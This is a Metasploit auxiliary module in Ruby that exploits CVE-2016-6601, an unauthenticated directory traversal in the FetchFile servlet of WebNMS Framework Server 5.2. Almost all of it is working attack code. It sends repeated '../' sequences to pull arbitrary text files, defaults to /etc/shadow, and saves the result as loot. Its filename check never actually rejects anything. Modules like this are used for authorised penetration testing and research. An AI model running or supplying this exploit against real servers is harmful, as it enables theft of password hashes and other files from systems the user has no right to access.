WebNMS Framework Server Arbitrary Text File Download

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'WebNMS Framework Server Arbitrary Text File Download',  
'Description' => %q{  
This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an  
unauthenticated user to download files off the file system by using a directory  
traversal attack on the FetchFile servlet.  
Note that only text files can be downloaded properly, as any binary file will get  
mangled by the servlet. Also note that for Windows targets you can only download  
files that are in the same drive as the WebNMS installation.  
This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on  
Windows and Linux.  
},  
'Author' => [  
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module  
],  
'License' => MSF_LICENSE,  
'References' => [  
[ 'CVE', '2016-6601'],  
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/2712' ],  
[ 'URL', 'https://seclists.org/fulldisclosure/2016/Aug/54' ]  
],  
'DisclosureDate' => '2016-07-04'  
)  
)  
register_options(  
[  
OptPort.new('RPORT', [true, 'The target port', 9090]),  
OptString.new('TARGETURI', [ true, 'WebNMS path', '/']),  
OptString.new('FILEPATH', [ false, 'The filepath of the file you want to download', '/etc/shadow']),  
OptString.new('TRAVERSAL_PATH', [ false, 'The traversal path to the target file (if you know it)']),  
OptInt.new('MAX_TRAVERSAL', [ false, "Maximum traversal path depth (if you don't know the traversal path)", 10])  
],  
self.class  
)  
end  
  
def check_filename(path)  
valid = true  
invalid_chars = [':', '?', '*', '|', '"', '<', '>']  
invalid_chars.each do |i|  
if path.include? i  
valid = false  
break  
end  
end  
end  
  
def run  
if check_filename(datastore['filepath'])  
file = nil  
if datastore['TRAVERSAL_PATH'].nil?  
traversal_size = datastore['MAX_TRAVERSAL']  
file = get_file(datastore['FILEPATH'], traversal_size)  
else  
file = get_file(datastore['TRAVERSAL_PATH'], 1)  
end  
if file.nil?  
print_error("#{peer} - Failed to download the specified file.")  
return  
else  
vprint_line(file)  
fname = File.basename(datastore['FILEPATH'])  
  
path = store_loot(  
'webnms.http',  
'text/plain',  
datastore['RHOST'],  
file,  
fname  
)  
print_good("File download successful, file saved in #{path}")  
end  
else  
print_error('Module Failed: Invalid Filename')  
end  
end  
  
def get_file(path, depth)  
while depth > 0  
file_name = '../' * depth + path  
vprint_status("Attempting to get file: #{file_name}")  
begin  
res = send_request_cgi(  
{  
'uri' => normalize_uri(target_uri.path, 'servlets', 'FetchFile'),  
'method' => 'GET',  
'vars_get' => { 'fileName' => file_name }  
}  
)  
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,  
Rex::HostUnreachable, Errno::ECONNRESET => e  
print_error("Connect to the target: #{e.class} - #{e.message}")  
return nil  
end  
if res &&  
res.code == 200 &&  
!res.body.to_s.empty? &&  
(res.body.to_s.include? 'File Found')  
return res.body.to_s  
end  
  
depth -= 1  
end  
end  
end  
`